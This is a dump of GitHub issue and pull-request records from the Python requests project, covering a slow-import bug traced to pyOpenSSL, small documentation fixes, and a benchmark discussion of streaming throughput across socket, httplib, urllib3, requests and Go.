not sure that will happen in a practical period of time\n", "@Lukasa thoughts?\n", "I'm with @kennethreitz. I don't like it, but I think we have to do it.\n", "To be clear, I don't _like_ it either, but given that downstream is unlikely to stop de-bundling anytime soon I prefer to control the way they do it.\n", "I think the only people who will be happy to have this will be our users frankly. Aren't they who matter most?\n", "@kennethreitz @Lukasa either of you have time to give this another once over? This will vastly improve user experience when using downstream distributed modules. Believe it, or not, it will also reduce the number of changes downstream re-distributors need to make to requests itself as well. Finally, it will make requests far more stable for our users on those systems who do not have the ability to \"Just use pip\". I still prefer to use pip myself (because I like to have a better control over what I use) but that isn't a luxury everyone has who wants to (and needs to) use requests. We shouldn't begrudge them for having a different set of constraints than we typically have.\n", "The code looks good to me, as it did originally, though I'm hardly an expert on Python's import machinery.\n\nI still resent the requirement to add this code. I accept the benefits and acknowledge the need for it, I just refuse to be happy about it. ;) Basically, I feel the same way about this as I do about cleaning the house.\n\nI'm +1 on merging, I'm sure I'll get over the pain. Want @kennethreitz to sign off though.\n", "I don't like this. I'd much rather convince the distro maintainers to stop mangling our code.\n", "I am currently using requests and requests-toolbelt in a CLI tool (which breaks due to this kind of imports), and since...\n- no clear consensus has been found so far\n- https://github.com/sigmavirus24/requests-toolbelt/pull/40 doesn't seem to get merged anytime soon\n- I get support requests for this every week\n\n...I am considering monkeypatching sys.modules for my tool to work on older Debian versions. For newer ones, I don't think there's a fix for such issues.\n" ]
https://api.github.com/repos/psf/requests/issues/2374
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2374/labels{/name}
https://api.github.com/repos/psf/requests/issues/2374/comments
https://api.github.com/repos/psf/requests/issues/2374/events
https://github.com/psf/requests/pull/2374
51,348,660
MDExOlB1bGxSZXF1ZXN0MjU2OTQ3NTI=
2,374
Updated the broken link to twitter streaming API documentation
{ "avatar_url": "https://avatars.githubusercontent.com/u/3087430?v=4", "events_url": "https://api.github.com/users/krvc/events{/privacy}", "followers_url": "https://api.github.com/users/krvc/followers", "following_url": "https://api.github.com/users/krvc/following{/other_user}", "gists_url": "https://api.github.com/users/krvc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/krvc", "id": 3087430, "login": "krvc", "node_id": "MDQ6VXNlcjMwODc0MzA=", "organizations_url": "https://api.github.com/users/krvc/orgs", "received_events_url": "https://api.github.com/users/krvc/received_events", "repos_url": "https://api.github.com/users/krvc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/krvc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/krvc/subscriptions", "type": "User", "url": "https://api.github.com/users/krvc", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-08T20:34:47Z
2021-09-08T09:01:09Z
2014-12-08T23:46:08Z
CONTRIBUTOR
resolved
The existing link to Twitter streaming API is broken in the Requests documentation. Updated the link with the working URL.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2374/reactions" }
https://api.github.com/repos/psf/requests/issues/2374/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2374.diff", "html_url": "https://github.com/psf/requests/pull/2374", "merged_at": "2014-12-08T23:46:08Z", "patch_url": "https://github.com/psf/requests/pull/2374.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2374" }
true
[ "Thanks @krvc \n" ]
https://api.github.com/repos/psf/requests/issues/2373
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2373/labels{/name}
https://api.github.com/repos/psf/requests/issues/2373/comments
https://api.github.com/repos/psf/requests/issues/2373/events
https://github.com/psf/requests/pull/2373
51,332,370
MDExOlB1bGxSZXF1ZXN0MjU2ODQ2NzY=
2,373
Enable GitHub syntax highlighting on README
{ "avatar_url": "https://avatars.githubusercontent.com/u/416575?v=4", "events_url": "https://api.github.com/users/frewsxcv/events{/privacy}", "followers_url": "https://api.github.com/users/frewsxcv/followers", "following_url": "https://api.github.com/users/frewsxcv/following{/other_user}", "gists_url": "https://api.github.com/users/frewsxcv/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/frewsxcv", "id": 416575, "login": "frewsxcv", "node_id": "MDQ6VXNlcjQxNjU3NQ==", "organizations_url": "https://api.github.com/users/frewsxcv/orgs", "received_events_url": "https://api.github.com/users/frewsxcv/received_events", "repos_url": "https://api.github.com/users/frewsxcv/repos", "site_admin": false, "starred_url": "https://api.github.com/users/frewsxcv/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/frewsxcv/subscriptions", "type": "User", "url": "https://api.github.com/users/frewsxcv", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-08T18:04:33Z
2021-09-08T09:01:10Z
2014-12-08T18:40:45Z
CONTRIBUTOR
resolved
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2373/reactions" }
https://api.github.com/repos/psf/requests/issues/2373/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2373.diff", "html_url": "https://github.com/psf/requests/pull/2373", "merged_at": "2014-12-08T18:40:44Z", "patch_url": "https://github.com/psf/requests/pull/2373.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2373" }
true
[ ":+1: \n", "reStructuredText on GitHub is so weird. Thanks @frewsxcv \n" ]
https://api.github.com/repos/psf/requests/issues/2372
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2372/labels{/name}
https://api.github.com/repos/psf/requests/issues/2372/comments
https://api.github.com/repos/psf/requests/issues/2372/events
https://github.com/psf/requests/issues/2372
51,270,385
MDU6SXNzdWU1MTI3MDM4NQ==
2,372
"import requests" is very slow on python2 when ndg-httpsclient and pyasn1 are available
{ "avatar_url": "https://avatars.githubusercontent.com/u/1496354?v=4", "events_url": "https://api.github.com/users/douardda/events{/privacy}", "followers_url": "https://api.github.com/users/douardda/followers", "following_url": "https://api.github.com/users/douardda/following{/other_user}", "gists_url": "https://api.github.com/users/douardda/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/douardda", "id": 1496354, "login": "douardda", "node_id": "MDQ6VXNlcjE0OTYzNTQ=", "organizations_url": "https://api.github.com/users/douardda/orgs", "received_events_url": "https://api.github.com/users/douardda/received_events", "repos_url": "https://api.github.com/users/douardda/repos", "site_admin": false, "starred_url": "https://api.github.com/users/douardda/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/douardda/subscriptions", "type": "User", "url": "https://api.github.com/users/douardda", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2014-12-08T08:55:23Z
2021-09-08T23:06:51Z
2014-12-08T15:34:54Z
NONE
resolved
Juste after upgrading my laptop to jessie, I discovered a problem with python requests on py2. For the record, I've created a Debian bug report https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=772506 But to summerize the problem (in a fresh jessie docker container): In a fresh virtualenv (on a jessie box): ``` (tst)root@ead8881e8ed5:/# pip install requests Downloading/unpacking requests Downloading requests-2.5.0-py2.py3-none-any.whl (464kB): 464kB downloaded Installing collected packages: requests Successfully installed requests Cleaning up... (tst)root@ead8881e8ed5:/# time python -c "import requests" real 0m0.087s user 0m0.044s sys 0m0.040s (tst)root@ead8881e8ed5:/# pip install ndg-httpsclient [...] (req)root@ead8881e8ed5:/req# time python -c "import requests" /req/local/lib/python2.7/site-packages/ndg/httpsclient/subj_alt_name.py:22: UserWarning: Error importing pyasn1, subjectAltName check for SSL peer verification will be disabled. Import error is: No module named pyasn1.type warnings.warn(import_error_msg) /req/local/lib/python2.7/site-packages/ndg/httpsclient/ssl_peer_verification.py:24: UserWarning: SubjectAltName support is disabled - check pyasn1 package installation to enable warnings.warn(SUBJ_ALT_NAME_SUPPORT_MSG) /req/local/lib/python2.7/site-packages/ndg/httpsclient/subj_alt_name.py:22: UserWarning: Error importing pyasn1, subjectAltName check for SSL peer verification will be disabled. Import error is: No module named pyasn1.type warnings.warn(import_error_msg) real 0m0.100s user 0m0.080s sys 0m0.012s (req)root@ead8881e8ed5:/req# pip install pyasn1 [...] (req)root@ead8881e8ed5:/req# time python -c "import requests" real 0m0.769s user 0m0.712s sys 0m0.052s ``` Notice the last time measurement (almost 800ms), which is very painfull since I use requests in cmdline utilities and mercurial extensions... David
{ "avatar_url": "https://avatars.githubusercontent.com/u/1496354?v=4", "events_url": "https://api.github.com/users/douardda/events{/privacy}", "followers_url": "https://api.github.com/users/douardda/followers", "following_url": "https://api.github.com/users/douardda/following{/other_user}", "gists_url": "https://api.github.com/users/douardda/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/douardda", "id": 1496354, "login": "douardda", "node_id": "MDQ6VXNlcjE0OTYzNTQ=", "organizations_url": "https://api.github.com/users/douardda/orgs", "received_events_url": "https://api.github.com/users/douardda/received_events", "repos_url": "https://api.github.com/users/douardda/repos", "site_admin": false, "starred_url": "https://api.github.com/users/douardda/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/douardda/subscriptions", "type": "User", "url": "https://api.github.com/users/douardda", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2372/reactions" }
https://api.github.com/repos/psf/requests/issues/2372/timeline
null
completed
null
null
false
[ "Your debian bug report blames OpenSSL, and shows that the time is lost in yacc. This suggests to me that it should only happen the first time: parsing shouldn't be required on initialization after the first time. Is that right, or does it happen consistently?\n", "It happens consistently (otherwise it would not be an issue).\n", "Interesting. The Debian bug shows the time is in `cryptography`. Ping @alex?\n", "Is this is reproducible just by doing `time python -c \"import OpenSSL\"`? If so, that would indicate that this is a problem with that package, not requests. (And we have no alternatives to be able to provide SNI for old versions of Python.)\n", "Yes, python -c \"import OpenSSL\" is the slow fellow. And it's been reported already https://github.com/pyca/pyopenssl/issues/137\n\nSo I guess web can close this issue.\n" ]
https://api.github.com/repos/psf/requests/issues/2371
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2371/labels{/name}
https://api.github.com/repos/psf/requests/issues/2371/comments
https://api.github.com/repos/psf/requests/issues/2371/events
https://github.com/psf/requests/issues/2371
51,049,181
MDU6SXNzdWU1MTA0OTE4MQ==
2,371
requests has poor performance streaming large binary responses
{ "avatar_url": "https://avatars.githubusercontent.com/u/772?v=4", "events_url": "https://api.github.com/users/alex/events{/privacy}", "followers_url": "https://api.github.com/users/alex/followers", "following_url": "https://api.github.com/users/alex/following{/other_user}", "gists_url": "https://api.github.com/users/alex/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/alex", "id": 772, "login": "alex", "node_id": "MDQ6VXNlcjc3Mg==", "organizations_url": "https://api.github.com/users/alex/orgs", "received_events_url": "https://api.github.com/users/alex/received_events", "repos_url": "https://api.github.com/users/alex/repos", "site_admin": false, "starred_url": "https://api.github.com/users/alex/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/alex/subscriptions", "type": "User", "url": "https://api.github.com/users/alex", "user_view_type": "public" }
[ { "color": "f7c6c7", "default": false, "description": null, "id": 167537670, "name": "Propose Close", "node_id": "MDU6TGFiZWwxNjc1Mzc2NzA=", "url": "https://api.github.com/repos/psf/requests/labels/Propose%20Close" } ]
closed
true
null
[]
null
40
2014-12-05T00:37:40Z
2021-09-08T04:00:55Z
2016-04-16T04:14:55Z
MEMBER
resolved
https://github.com/alex/http-client-bench contains the benchmarks I used. The results are something like: | | requests/http | socket | | --- | --- | --- | | CPython | 12MB/s | 200MB/s | | PyPy | 80MB/s | 300MB/s | | Go | 150MB/s | n/a | requests imposes a considerable overhead compared to a socket, particularly on CPython.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2371/reactions" }
https://api.github.com/repos/psf/requests/issues/2371/timeline
null
completed
null
null
false
[ "That overhead is unexpectedly large. However, avoiding it might be tricky.\n\nThe big problem is that we do quite a lot of processing per chunk. That's all the way down the stack: requests, urllib3 and httplib. It would be extremely interesting to see where the time is being spent to work out who is causing the inefficiency.\n", "guess a next step would be to try profiling httplib / urllib3 to see the\nperformance there?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Dec 4, 2014 at 5:01 PM, Cory Benfield [email protected]\nwrote:\n\n> That overhead is unexpectedly large. However, avoiding it might be tricky.\n> \n> The big problem is that we do quite a lot of processing per chunk. That's\n> all the way down the stack: requests, urllib3 and httplib. It would be\n> extremely interesting to see where the time is being spent to work out who\n> is causing the inefficiency.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65732050\n> .\n", "Just ran benchmarks with urllib3:\n\nPyPy: 120MB/s\nCPython: 70MB/s\n\nAnd I re-ran CPython + requests: 35MB/s\n\n(My machine seems to be experiencing a far bit of noise in benchmarks, if anyone has a quieter system they can these on, that'd be awesome)\n", "I tried running these on my machine after shutting down every other\napplication & terminal window and got a fair amount of noise as well - the\nsocket benchmark was anywhere from 30mb/s to 460mb/s.\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Dec 4, 2014 at 9:24 PM, Alex Gaynor [email protected]\nwrote:\n\n> Just ran benchmarks with urllib3:\n> \n> PyPy: 120MB/s\n> CPython: 70MB/s\n> \n> And I re-ran CPython + requests: 35MB/s\n> \n> (My machine seems to be experiencing a far bit of noise in benchmarks, if\n> anyone has a quieter system they can these on, that'd be awesome)\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65748982\n> .\n", "I made the benchmarks easier to run now, so other folks can hopefully verify my numbers:\n\nCPython:\n\n```\nBENCH SOCKET:\n 8GiB 0:00:22 [ 360MiB/s] [======================================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:02:34 [53.1MiB/s] [======================================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:30 [90.2MiB/s] [======================================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:30 [90.7MiB/s] [======================================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:26 [ 305MiB/s] [======================================================>] 100%\n```\n\nPyPy:\n\n```\nBENCH SOCKET:\n 8GiB 0:00:22 [ 357MiB/s] [======================================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:00:43 [ 189MiB/s] [======================================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:07 [ 121MiB/s] [======================================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:09 [ 117MiB/s] [======================================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:26 [ 307MiB/s] [======================================================>] 100%\n```\n", "Uh...those numbers are weird. CPython's httplib is slower than requests or urllib3, even though both libraries use httplib? That just cannot be right.\n", "They reproduce consistently for me -- can you try the benchmarks and see if\nyou can reproduce? Assuming you can, do you see anything wrong with the\nbenchmarks?\n\nOn Fri Dec 05 2014 at 11:16:45 AM Cory Benfield [email protected]\nwrote:\n\n> Uh...those numbers are weird. CPython's httplib is slower than requests or\n> urllib3, even though both libraries use httplib? That just cannot be right.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65821989\n> .\n", "I'm just grabbing a known-quiet machine now. Should take a few minutes to become available because it's a physical box that has to get installed (god I love MAAS).\n", "`CPython 2.7.8`\n\n```\nBENCH SOCKET:\n 8GiB 0:00:26 [ 309MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:02:24 [56.5MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:42 [79.7MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:45 [77.9MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:27 [ 297MiB/s] [================================>] 100%\n```\n", "For what it's worth:\n\n[This patch](https://gist.github.com/frewsxcv/1c0f3c81cda508e1bca9), `CPython 3.4.2`:\n\n```\nBENCH SOCKET:\n 8GiB 0:00:27 [ 302MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:00:53 [ 151MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:00:54 [ 149MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:00:56 [ 144MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:31 [ 256MiB/s] [================================>] 100%\n```\n", "You should be able to get that same effect on Python2 with\n`env PYTHONUNBUFFERED=` or the `-u` flag.\n\nOn Fri Dec 05 2014 at 11:42:36 AM Corey Farwell [email protected]\nwrote:\n\n> For what it's worth:\n> \n> This patch https://gist.github.com/frewsxcv/1c0f3c81cda508e1bca9, CPython\n> 3.4.2:\n> \n> BENCH SOCKET:\n> 8GiB 0:00:27 [ 302MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:00:53 [ 151MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:00:54 [ 149MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:00:56 [ 144MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:31 [ 256MiB/s] [================================>] 100%\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65826239\n> .\n", "@alex Interestingly, neither `env PYTHONUNBUFFERED=` or `-u` has the same effect on Python 2. Results from my machine incoming.\n", "Alright, the below data comes from a machine that is doing nothing else but running these tests. The last test was run with the Python `-u` flag set, and as you can see that flag has no effect.\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 500MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:32 [88.6MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:21 [ 385MiB/s] [================================>] 100%\n```\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 503MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:33 [87.8MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:22 [99.3MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n```\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 506MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:31 [89.1MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:21 [ 389MiB/s] [================================>] 100%\n```\n\nThese numbers are extremely stable, and show the following features:\n1. Raw socket reads are fast (duh).\n2. Go is about 80% the speed of a raw socket read.\n3. urllib3 is about 20% the speed of a raw socket read.\n4. requests is slightly slower than urllib3, which makes sense as we add a couple of stack frames for the data to pass through.\n5. httplib is slower than requests/urllib3. That's just impossible, and I suspect that we must be configuring httplib or the sockets library in a way that httplib is not.\n", "FWIW, I just merged adding `buffering=True` from @kevinburke, do your runs\ninclude that?\n\nOn Fri Dec 05 2014 at 12:04:40 PM Cory Benfield [email protected]\nwrote:\n\n> Alright, the below data comes from a machine that is doing nothing else\n> but running these tests. The last test was run with the Python -u flag\n> set, and as you can see that flag has no effect.\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 500MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:32 [88.6MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 385MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 503MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:33 [87.8MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:22 [99.3MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 506MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:31 [89.1MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 389MiB/s] [================================>] 100%\n> \n> These numbers are extremely stable, and show the following features:\n> 1. Raw socket reads are fast (duh).\n> 2. Go is about 80% the speed of a raw socket read.\n> 3. urllib3 is about 20% the speed of a raw socket read.\n> 4. requests is slightly slower than urllib3, which makes sense as we\n> add a couple of stack frames for the data to pass through.\n> 5. httplib is slower than requests/urllib3. That's just impossible,\n> and I suspect that we must be configuring httplib or the sockets library in\n> a way that httplib is not.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65829335\n> .\n", "Cory - see the latest version of the bench client which turns on the\nbuffering=True in httplib (as requests/urllib3 do)\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Fri, Dec 5, 2014 at 10:04 AM, Cory Benfield [email protected]\nwrote:\n\n> Alright, the below data comes from a machine that is doing nothing else\n> but running these tests. The last test was run with the Python -u flag\n> set, and as you can see that flag has no effect.\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 500MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:32 [88.6MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 385MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 503MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:33 [87.8MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:22 [99.3MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n> \n> Python 2.7.6\n> go version go1.2.1 linux/amd64\n> BENCH SOCKET:\n> 8GiB 0:00:16 [ 506MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:01:31 [89.1MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\n> BENCH GO HTTP\n> 8GiB 0:00:21 [ 389MiB/s] [================================>] 100%\n> \n> These numbers are extremely stable, and show the following features:\n> 1. Raw socket reads are fast (duh).\n> 2. Go is about 80% the speed of a raw socket read.\n> 3. urllib3 is about 20% the speed of a raw socket read.\n> 4. requests is slightly slower than urllib3, which makes sense as we\n> add a couple of stack frames for the data to pass through.\n> 5. httplib is slower than requests/urllib3. That's just impossible,\n> and I suspect that we must be configuring httplib or the sockets library in\n> a way that httplib is not.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65829335\n> .\n", "Yeah, that fixes the performance behaviour of httplib to make far more sense.\n\nNew results and conclusions:\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 499MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:12 [ 113MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n```\n1. Raw socket reads are fast (duh).\n2. Go is about 80% the speed of a raw socket read.\n3. httplib is just under 25% the speed of a raw socket read.\n4. urllib3 is about 20% the speed of a raw socket read, adding some small overhead to httplib.\n5. requests is slightly slower than urllib3, which makes sense as we add a couple of stack frames for the data to pass through.\n", "So, arguably the real cost here is httplib. Speeding this up requires getting httplib out of the way.\n\nI'm interested to work out what part of httplib is costing us though. I think profiling `bench_httplib.py` is a good next step.\n", "I've ruled out the conversion of the socket to a file object through `socket.makefile` by adding that line to the `bench_socket.py` test, that doesn't slow it down at all. Weirdly, it appears to make it faster.\n", "The answer is almost certainly the transfer-encoding: chunked handling.\nSee: https://github.com/alex/http-client-bench/pull/6 , switching to\nContent-Length on the server produces some unexpected results.\n\nOn Fri Dec 05 2014 at 12:24:53 PM Cory Benfield [email protected]\nwrote:\n\n> So, arguably the real cost here is httplib. Speeding this up requires\n> getting httplib out of the way.\n> \n> I'm interested to work out what part of httplib is costing us though. I\n> think profiling bench_httplib.py is a good next step.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65831653\n> .\n", "Interesting.\n\nThe chunked handling is almost certainly the problem, and I'm not really surprised that go handles it better, especially as chunked is the default HTTP mode for go.\n\nHowever, requests being fast than a raw socket is...unexpected!\n\nOne thing worth noting: if the socket wasn't decoding the chunked encoding in the previous tests then it got an unfair advantage, as it was actually reading less data than the other methods were! They were all reading the chunked headers as well as the 8GB of data.\n\nThis leads to a follow-on question: do we still think all of these methods are actually reading the same amount of data?\n", "Yes, the socket layer was cheating, it didn't decode the chunked metadata,\nand technically read a bit less. It was there as a baesline for \"how fast\ncan we read\", not to prove anything.\n\nOn Fri Dec 05 2014 at 12:33:10 PM Cory Benfield [email protected]\nwrote:\n\n> Interesting.\n> \n> The 